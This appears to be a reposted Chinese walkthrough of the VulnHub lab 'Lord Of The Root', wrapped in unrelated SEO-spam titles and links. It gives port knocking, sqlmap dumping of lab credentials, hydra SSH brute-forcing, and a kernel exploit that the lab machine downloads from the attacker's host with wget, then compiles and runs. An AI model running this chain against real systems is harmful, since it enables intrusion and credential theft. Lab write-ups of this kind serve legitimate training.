当前位置: 首页 > wzjs >正文

卡密提取网站怎么做百度百科词条

wzjs 2025/8/16 5:19:52
卡密提取网站怎么做,百度百科词条,江门网站建设公司,跨境电商网站 建设要求Lord Of The Root: 1.0.1 来自 <Lord Of The Root: 1.0.1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.247 3&…

Lord Of The Root: 1.0.1

来自 <Lord Of The Root: 1.0.1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.247

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.247

发现只有22端口开放了ssh服务,那就只能访问看看

1. 确认端口敲击需求

  • 目标服务器可能隐藏了其他服务的端口,需通过预定义的端口序列敲门才能临时开放。
  • 常见序列示例:7000,8000,9000(TCP/UDP)或动态组合(需信息收集)。

2. knock自动化工具测试端口敲击
sudo apt install knockd
knock -v 192.168.23.247 1 2 3

nmap -sV -T4 -p- -A 192.168.23.247

这次就能够成功扫描出来端口号

4,然后再访问1337端口的http服务

扫描网站存在的子目录

dirsearch -u http://192.168.23.247:1337 -x 403,404,301

http://192.168.23.247:1337/404.html

查看源代码复现一个base64编码的字符串

经过两次base64解码得到一个文件路径

访问之后发现是一个登录页面

http://192.168.23.247:1337/978345210/index.php

5,对网页进行信息收集和漏洞验证

没有明显的特征,因为是一个登录框,尝试结合burpsuite手工注入验证有无sql注入

(需要使用powershell脚本在window上面敲击一下1,2,3端口,否则无法正常访问1337端口的web服务)

# 保存为 Knock-Ports.ps1,右键以管理员身份运行

$target = "192.168.23.247"

$ports = @(1, 2, 3)  # 修改为猜测的端口序列

foreach ($port in $ports) {

  try {

    $socket = New-Object System.Net.Sockets.TcpClient

    $socket.ConnectAsync($target, $port).Wait(100)  # 100ms超时

    Write-Host "[+] SYN sent to port $port"

  } catch {

    Write-Host "[!] Failed to send SYN to port $port"

  } finally {

    $socket.Close()

  }

}

敲击之后访问成功

抓一个POST请求包

还是直接偷懒使用sqlmap扫描一下

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch --dbs

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch -D Webapp --tables

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms --batch -D Webapp -T Users --columns

sqlmap -o -u 'http://192.168.23.247:1337/978345210/index.php' --forms -D Webapp -T Users  --dump --bacth

成功得到一堆账户密码

iwilltakethering/frodo  

MyPreciousR00t/smeagol

AndMySword/aragorn

AndMyBow/legolas

AndMyAxe/gimli

6,将这些账户密码写入字典进行ssh爆破

hydra -L username.txt -P password.txt 192.168.23.247 ssh

ssh登录成功 smeagol/MyPreciousR00t

ssh smeagol@192.168.23.247

7,信息收集一下

sudo -l

find / -perm -4000 -type f 2>/dev/null

/SECRET/door1/file

/SECRET/door2/file

/SECRET/door3/file

  • 这些文件非常规系统文件,可能是靶场故意设置的提权点。
  • 检查文件属性和类型:
    ls -l /SECRET/door*/file
    file /SECRET/door*/file

8,还是尝试使用内核提权exp脚本

searchsploit ubuntu 14.04 

使用39166.c进行提权

searchsploit -m 39166.c

然后在kali上面开启一个http服务,控制靶机下载这个攻击脚本

python -m http.server

wget http://192.168.23.182:8000/39166.c

gcc进行编译给文件777权限

gcc 39166.c -o 39166

chmod 777 39166

./39166

提权成功成为root用户,得到flag

http://www.dtcms.com/wzjs/340448.html

相关文章:

  • 国内如何做国外网站的兼职项目站长工具官网域名查询
  • 中国设计师网效果图网络优化基础知识
  • 海口手机网站制作济南网络推广公司
  • 信息网站建设汇报seo北京优化
  • 大连专业做网站代写平台在哪找
  • 涡阳网站建设哪家好全网营销公司
  • 网站需要每个城市做推广吗搜索引擎优化自然排名的优点
  • 个人网站名可以和别人一样吗中国国家人才培训网官网
  • 贵阳论坛网站建设国内免费域名注册
  • 建网站能上传多少数据seo网站seo
  • 宁夏百度网站怎么做最新seo新手教程
  • 房地产销售头像长沙seo优化排名
  • 如何做网站源码备份小程序开发公司十大排名
  • 二级域名做外贸网站好吗如何推广好一个产品
  • 企业每年向工商网站做申报英文谷歌seo
  • 网站内链接怎么做我对网络营销的理解
  • 做网站python和php哪个好学市场调研方法
  • 辽宁网上注册公司流程seo快速优化软件网站
  • 霍邱网站设计重庆seo推广公司
  • 天河区建设和水务局网站建网站多少钱
  • 畜牧业网站建设制作网站要多少费用
  • 沈阳网站建设培训班百度账号人工客服电话
  • 扬州集团网站建设如何申请百度竞价排名
  • 佛山外贸网站建设方案客户管理系统
  • 微信网站建设报价表武汉百度百科
  • 保定专门做网站的公司百度搜索历史记录
  • 沂源做网站如何做好产品网络推广
  • 昆明做网站公优搜云seo
  • 有哪些做课件的网站泰州百度公司代理商
  • 程序员 给老婆做网站关键词完整版